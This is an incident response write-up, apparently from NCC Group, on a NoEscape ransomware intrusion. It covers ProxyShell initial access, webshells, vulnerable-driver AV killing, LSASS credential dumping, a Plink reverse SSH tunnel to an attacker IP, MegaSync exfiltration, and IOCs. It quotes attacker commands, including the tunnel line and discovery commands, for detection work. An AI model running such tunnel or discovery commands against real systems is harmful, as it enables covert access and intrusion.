Author: Alex Jessop (@ThisIsFineChief)
Summary
Tl;dr
This post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving the Ransomware-as-a-Service known as NoEscape.
Below provides a summary of findings which are presented in this blog post:
- Initial access gained via a publicly disclosed vulnerability in an externally facing server
- Use of vulnerable drivers to disable security controls
- Remote Desktop Protocol was used for Lateral Movement
- Access persisted through tunnelling RDP over SSH
- Exfiltration of data via Mega
- Execution of ransomware via scheduled task
NoEscape
NoEscape is a new financially motivated ransomware group delivering a Ransomware-as-a-Service program which was first observed in May 2023 being advertised on a dark web forum, as published by Cyble [1]. It is believed they are a spin-off of the group that used to be known as Avaddon. This post will focus on the Tactics, Techniques and Procedures employed by a threat actor utilising NoEscape Ransomware in a recent Incident Response Engagement.
Review of the NoEscape dark web portal and their list of victims shows no trends in industries targeted which suggests they are opportunistic in nature. To date, 89 victims (18 active) have been posted on the NoEscape portal, with the first being published on 14th June 2023. Monetary gain is the main objective of this ransomware group. In addition to the usual double extortion method of ransomware and data exfiltration which has been popular in recent years, NoEscape also has a third extortion method: the ability to purchase a DDoS/Spam add on to further impact victims.
Incident Overview
NoEscape appear to target vulnerable external services, with the initial access vector being via the exploitation of a Microsoft Exchange server which was publicly facing in the victim’s environment. Exploitation led to webshells being created on the server and gave the threat actor an initial foothold into the environment.
The threat actor seemed opportunistic in nature, whose objective was monetary gain with a double extortion method of ransomware which included data exfiltration. However, they did appear low skilled due to a kitchen sink approach employed when trying to disable antivirus and dump credentials. Multiple different tools were deployed to enact the same job for the threat actor, which is quite a noisy approach often not observed by the more sophisticated threat actor.
A secondary access method was deployed to ensure continued access in the event that the initial access vector was closed to the threat actor. Data was exfiltrated to a well-known cloud storage provider, however this was interrupted due to premature execution of the ransomware which encrypted files that were being exfiltrated.
Timeline
- T – Initial Access gained via webshell
- T+1 min – Initial recon and credential dumping activity
- T+9 min – Secondary access method established via Plink
- T+18 days – Second phase of credential dumping activity
- T+33 days – Data Exfiltration
- T+33 days – Ransomware Executed
Mitre TTPs
Initial Access
T1190 – Exploit Public-Facing Application
In keeping with the opportunistic nature, initial access was gained through exploiting the vulnerabilities CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 which are more commonly known as ProxyShell.
WebShell were uploaded to the victims Microsoft Exchange server and gave the threat actor an initial foothold on the network.
Execution
T1059.001 – Command and Scripting Interpreter: PowerShell
PowerShell was utilised by the threat actor, using the Defender command Set-MpPreference to exclude specific paths from being monitored. This was an attempt to ensure webshells were not detected and remediated by the antivirus.
T1059.003 – Command and Scripting Interpreter: Windows Command Shell
Windows native commands were executed during the discovery phase; targeting domain admin users, antivirus products installed etc.
- net localgroup administrators
- cmd.exe /c net group \”REDACTED” /domain
- cmd.exe /c WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
T1053.005 – Scheduled Task
As has been well documented [2], a Scheduled Task with the name SystemUpdate was used to execute the ransomware.
Persistence
T1505.003 – Server Software Component: Web Shell
Web Shells provided the threat actor continued access to the estate through the initial access vector.
Privilege Escalation
T1078.002 – Valid Accounts: Domain Accounts
Threat actor gained credentials for valid domain accounts which were used for the majority of lateral movement and execution
T1078.003 – Valid Accounts: Local Accounts
The threat actor was observed enabling the DefaultAccount and utilising this to execute their tools locally on a host.
Defence Evasion
T1562.001 – Impair Defences: Disable or Modify Tools
The threat actor showed their potential lack of experience as multiple different drivers were dropped in an attempt to disable the deployed EDR and AV. Instead of deploying a single driver, multiple drivers and tools were dropped in a ‘throw the kitchen sink at it’ approach.
| File | Description |
| Gmer.exe | GMER is a rootkit detector and remover, utilised by threat actors to identify and kill processes such as antivirus and EDR |
| aswArPot.sys | An Avast antivirus driver deployed by threat actors to disable antivirus solutions. |
| mhyprot2.sys | Genshin Impact anti-cheat driver which is utilised by threat actors to kill antivirus processes. |
Credential Access
T1003 – Credential Dumping
Similar to the above, multiple credential dumping tools were dropped by the threat actor in an attempt to obtain legitimate credentials.
| File | Description |
| CSDump.exe | Unknown dumping tool (no longer on disk) |
| Fgdump.exe | A tool for mass password auditing of the Windows systems by dumping credentials from LSASS |
| MemoryDumper.exe | Creates an encrypted memory dump from LSASS process to facilitate offline cracking of passwords hashes. |
Discovery
T1087.001 – Account Discovery: Local Account
A number of inbuilt Windows commands were used to gain an understanding of the local administrators on the group:
net localgroup administrators
net group “REDACTED” /domain
T1018 – Remote System Discovery
Similarly, inbuilt Windows commands were also used to discover information on the network, such as the primary domain controller for the estate:
netdom query /d:REDACTED PDC
Lateral Movement
T1021.001 – Remote Desktop Protocol
Valid domain credentials were obtained through dumping the LSASS process, these accounts were then used to laterally move across the environment via RDP.
Command and Control
T1572 – Protocol Tunnelling
Secondary method of access was deployed by the threat actor, in the event that the initial access vector was closed, by deploying PuTTY link onto multiple hosts in the environment. A SSH tunnel was created to present RDP access to the host from a public IP address owned by the threat actor.
p64.exe REDACTED@172.93.181[.]238 -pw REDACTED -P 443 -2 -4 -T -N -C -R 0.0.0.0:10445:127.0.0.1:3389
T1219 – Remote Access Software
The threat actor also utilised software already deployed onto the estate to maintain access, in this scenario obtaining credentials to the TeamViewer deployment.
Exfiltration
T1048.002 – Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
As has become common when data is exfiltrated from a victims estate in recent years, the MegaSync.exe utility was used to exfiltrate data from the estate directly to Mega’s cloud storage platform.
Impact
T1486 – Data Encrypted for Impact
The encryptor targeted all files on the C:\ drive except those with the below extension:
bat, bin, cmd, com, cpl, dat, dll, drv, exe, hta, ini, lnk, lock, log, mod, msc, msi, msp, pif, prf, rdp, scr, shs, swp, sys, theme
IOC List
| Value | Type | Description |
| 142D950E7DD975056BD3487672C14C26450D55C1 | SHA1 | Mega Sync |
| 2F366382D2DB32AACA15F9CADC14C693B33C361F | SHA1 | Ransomware binary |
| 4709827c7a95012ab970bf651ed5183083366c79 | SHA1 | Putty Link |
| 75DB5A0B47783B4E4C812CF521C3A443FACB6BBB | SHA1 | Ransomware binary |
| BB3593007FE44993E102830EDC3255836A97FB01 | SHA1 | Ransomware binary |
| FB0A150601470195C47B4E8D87FCB3F50292BEB2 | SHA1 | PsExec |
| 214551A8C07633D8C70F7BE4689EFE3BB74ABFD6E64264CF440100413EA6BE6B | SHA256 | Mega Sync |
| 53B5A02259C69AB213BA1458D7F70B01614CC32E040B849AD67FEFB07A725945 | SHA256 | Ransomware binary |
| 828e81aa16b2851561fff6d3127663ea2d1d68571f06cbd732fdf5672086924d | SHA256 | Putty Link |
| 078212DEA0C7FD9CDFA40DBB320B29900F4E8BA0E64D2199F6CAE0BC23D1C625 | SHA256 | Ransomware binary |
| 2020CAE5115B6980D6423D59492B99E6AAA945A2230B7379C2F8AE3F54E1EFD5 | SHA256 | Ransomware binary |
| AD6B98C01EE849874E4B4502C3D7853196F6044240D3271E4AB3FC6E3C08E9A4 | SHA256 | PsExec |
| 172.93.181[.]238 | IP | Malicious IP used for tunnelling via Plink |
| 66.203.125[.]14 | IP | Mega IP |
MITRE ATT CK®
| Tactic | Technique | ID | Description |
| Initial Access | Exploit Public-Facing Application | T1190 | The vulnerabilities CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207, commonly known as ProxyShell, were exploited |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | PowerShell was utilized to add an exclusion path to the anti-virus to prevent the web shells from being detected |
| Execution | Command and Scripting Interpreter: Windows Command Shell | T1059.003 | Native Windows commands were utilised during the discovery phase of the endpoint and victim estate |
| Execution | Scheduled Task | T1053.005 | A scheduled task was utilised to execute the ransomware binary |
| Persistence | Server Software Component: Web Shell | T1505.003 | Web Shells were uploaded to the Exchange server via exploitation of the ProxyShell vulnerabilities |
| Privilege Escalation | Valid Accounts: Domain Accounts | T1078.002 | Credentials to domain accounts were obtained and utilised for lateral movement |
| Privilege Escalation | Valid Accounts: Local Accounts | T1078.003 | A disabled local account was re-enabled by the threat actor and used. |
| Defence Evasion | Impair Defenses: Disable or Modify Tools | T1562.001 | Tooling was deployed in an attempt to disable the deployed endpoint security controls |
| Credentials Access | Credential Dumping | T1003 | Various different tools were deployed to dump credentials from LSASS |
| Discovery | Account Discovery: Local Account | T1087.001 | ‘net’ native Windows command was utilised to discovery users in the domain administrator group |
| Discovery | Remote System Discovery | T1018 | ‘netdom’ was utilised to discover the primary domain controller for the victims estate |
| Lateral Movement | Remote Desktop Protocol | T1021.001 | The primary method of lateral movement was RDP |
| Command and Control | Protocol Tunnelling | T1572 | PuTTY link, also known as Plink, was used to tunnel RDP connections over SSH to provide the threat actor with direct access to the Exchange server as back-up to the web shells |
| Command and Control | Remote Access Software | T1219 | Access was gained to the existing TeamViewer deployment and utilised for lateral movement |
| Exfiltration | Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | T1048.002 | MegaSync was utilised to exfiltrate data to the cloud storage solution Mega |
| Impact | Data Encrypted for Impact | T1486 | Ransomware was deployed across the estate |
References
[1] – Cyble — ‘NoEscape’ Ransomware-as-a-Service (RaaS)
[2] – Meet NoEscape: Avaddon ransomware gang’s likely successor – RedPacket Security
